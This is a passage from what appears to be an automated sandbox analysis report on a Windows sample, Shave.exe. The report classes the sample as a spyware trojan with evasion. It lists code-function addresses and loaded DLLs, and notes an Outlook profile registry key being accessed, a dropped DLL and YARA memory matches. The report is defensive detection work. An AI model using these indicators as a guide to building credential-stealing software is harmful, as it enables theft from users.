            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B36B303_2_04B36B30
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B35B393_2_04B35B39
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3D9383_2_04B3D938
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3F1203_2_04B3F120
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3D9273_2_04B3D927
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B383283_2_04B38328
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3F1113_2_04B3F111
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B317103_2_04B31710
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B39B103_2_04B39B10
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B383193_2_04B38319
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B329183_2_04B32918
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B39B0A3_2_04B39B0A
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B349083_2_04B34908
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3290E3_2_04B3290E
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B391713_2_04B39171
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3E77F3_2_04B3E77F
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B309603_2_04B30960
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3A9683_2_04B3A968
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3C1503_2_04B3C150
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B309503_2_04B30950
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B33B583_2_04B33B58
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3A9583_2_04B3A958
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3C1423_2_04B3C142
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B36B403_2_04B36B40
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B35B483_2_04B35B48
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B33B4E3_2_04B33B4E
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B570C03_2_04B570C0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B5D7103_2_04B5D710
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B554A03_2_04B554A0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B522A03_2_04B522A0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B538803_2_04B53880
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B506803_2_04B50680
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B56A803_2_04B56A80
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B55AE03_2_04B55AE0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B528E03_2_04B528E0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B53EC03_2_04B53EC0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B50CC03_2_04B50CC0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B500363_2_04B50036
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B548203_2_04B54820
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B516203_2_04B51620
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B55E003_2_04B55E00
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B52C003_2_04B52C00
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B54E603_2_04B54E60
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B51C603_2_04B51C60
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B564403_2_04B56440
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B532403_2_04B53240
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B500403_2_04B50040
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B5EE483_2_04B5EE48
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B56DA03_2_04B56DA0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B53BA03_2_04B53BA0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B509A03_2_04B509A0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B551803_2_04B55180
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B51F803_2_04B51F80
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B541E03_2_04B541E0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B50FE03_2_04B50FE0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B541D03_2_04B541D0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B557C03_2_04B557C0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B525C03_2_04B525C0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B599C83_2_04B599C8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B561203_2_04B56120
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B52F203_2_04B52F20
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B545003_2_04B54500
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B513003_2_04B51300
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B567603_2_04B56760
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B535603_2_04B53560
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B503603_2_04B50360
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B503503_2_04B50350
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B567503_2_04B56750
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B54B403_2_04B54B40
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B519403_2_04B51940
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B597403_2_04B59740
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E41CF03_2_04E41CF0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E484703_2_04E48470
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4FB303_2_04E4FB30
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E41CE03_2_04E41CE0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4F4F03_2_04E4F4F0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E490F03_2_04E490F0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4C2F03_2_04E4C2F0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E404FA3_2_04E404FA
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4D8D03_2_04E4D8D0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4A6D03_2_04E4A6D0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4BCB03_2_04E4BCB0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E48AB03_2_04E48AB0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4EEB03_2_04E4EEB0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E40E8B3_2_04E40E8B
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4A0903_2_04E4A090
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4D2903_2_04E4D290
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E40E983_2_04E40E98
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4E8703_2_04E4E870
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4B6703_2_04E4B670
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4A07F3_2_04E4A07F
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E400403_2_04E40040
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4CC413_2_04E4CC41
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E49A503_2_04E49A50
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4CC503_2_04E4CC50
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E418283_2_04E41828
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4B0303_2_04E4B030
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4E2303_2_04E4E230
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E418173_2_04E41817
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4C6103_2_04E4C610
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E494103_2_04E49410
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4F8103_2_04E4F810
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4001A3_2_04E4001A
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4DBF03_2_04E4DBF0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4A9F03_2_04E4A9F0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4F1D03_2_04E4F1D0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E409D03_2_04E409D0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E48DD03_2_04E48DD0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4BFD03_2_04E4BFD0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4D5B03_2_04E4D5B0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4A3B03_2_04E4A3B0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E409BF3_2_04E409BF
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4B9903_2_04E4B990
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E487903_2_04E48790
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4EB903_2_04E4EB90
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E413603_2_04E41360
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E433603_2_04E43360
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E49D703_2_04E49D70
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4CF703_2_04E4CF70
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4E5503_2_04E4E550
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4B3503_2_04E4B350
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E413513_2_04E41351
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4C9303_2_04E4C930
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E497303_2_04E49730
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E405083_2_04E40508
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4AD103_2_04E4AD10
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04E4DF103_2_04E4DF10
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_379F0D883_2_379F0D88
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_379F5CB63_2_379F5CB6
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_379F3FB23_2_379F3FB2
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_379F36F03_2_379F36F0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_379F30083_2_379F3008
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_379F22383_2_379F2238
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_379F29203_2_379F2920
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_379F1B503_2_379F1B50
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_379F14703_2_379F1470
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_379F2FF83_2_379F2FF8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_379F36E13_2_379F36E1
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_379F29113_2_379F2911
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_379F0A103_2_379F0A10
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_379F00063_2_379F0006
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_379F0A013_2_379F0A01
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_379F1B3F3_2_379F1B3F
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_379F22293_2_379F2229
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_379F00403_2_379F0040
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_379F0D783_2_379F0D78
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_379F14603_2_379F1460
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_383150283_2_38315028
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831FC683_2_3831FC68
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_383129683_2_38312968
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831D9A83_2_3831D9A8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831DE003_2_3831DE00
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_38311E803_2_38311E80
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_383193283_2_38319328
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_383117A03_2_383117A0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_383150203_2_38315020
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831F8103_2_3831F810
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_383100123_2_38310012
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_38319C183_2_38319C18
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_383100403_2_38310040
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831CCA03_2_3831CCA0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831D0F83_2_3831D0F8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831D5503_2_3831D550
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_383195483_2_38319548
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831D9993_2_3831D999
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831DDF13_2_3831DDF1
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831DDFF3_2_3831DDFF
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_38311E703_2_38311E70
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831E2573_2_3831E257
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831E2583_2_3831E258
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831E24A3_2_3831E24A
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831E6B03_2_3831E6B0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831E6A03_2_3831E6A0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831E6AF3_2_3831E6AF
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_38310B303_2_38310B30
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_38310B203_2_38310B20
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831EB083_2_3831EB08
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831EF603_2_3831EF60
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831EF513_2_3831EF51
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831F3B83_2_3831F3B8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_38318BA03_2_38318BA0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831C3AE3_2_3831C3AE
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_38318B913_2_38318B91
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_3831178F3_2_3831178F
            Source: C:\Users\user\Desktop\Shave.exeCode function: String function: 00402C41 appears 46 times
            Source: Shave.exe, 00000003.00000002.3279604982.0000000004BB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Shave.exe
            Source: Shave.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/5@7/5
            Source: C:\Users\user\Desktop\Shave.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
            Source: C:\Users\user\Desktop\Shave.exeCode function: 0_2_004046FF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046FF
            Source: C:\Users\user\Desktop\Shave.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
            Source: C:\Users\user\Desktop\Shave.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberryJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Shave.exeFile created: C:\Users\user\AppData\Local\Temp\nsv5BEB.tmpJump to behavior
            Source: Shave.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Shave.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Shave.exeVirustotal: Detection: 45%
            Source: C:\Users\user\Desktop\Shave.exeFile read: C:\Users\user\Desktop\Shave.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Shave.exe "C:\Users\user\Desktop\Shave.exe"
            Source: C:\Users\user\Desktop\Shave.exeProcess created: C:\Users\user\Desktop\Shave.exe "C:\Users\user\Desktop\Shave.exe"
            Source: C:\Users\user\Desktop\Shave.exeProcess created: C:\Users\user\Desktop\Shave.exe "C:\Users\user\Desktop\Shave.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Shave.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2342825551.0000000004332000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2342460807.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Shave.exe PID: 1216, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Shave.exeCode function: 0_2_6F971B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6F971B63
            Source: C:\Users\user\Desktop\Shave.exeCode function: 0_2_6F972FD0 push eax; ret 0_2_6F972FFE
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_004020ED push E9004081h; iretd 3_2_004020F2
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_00159C30 push esp; retf 0017h3_2_00159D55
            Source: C:\Users\user\Desktop\Shave.exeFile created: C:\Users\user\AppData\Local\Temp\nsa5D43.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
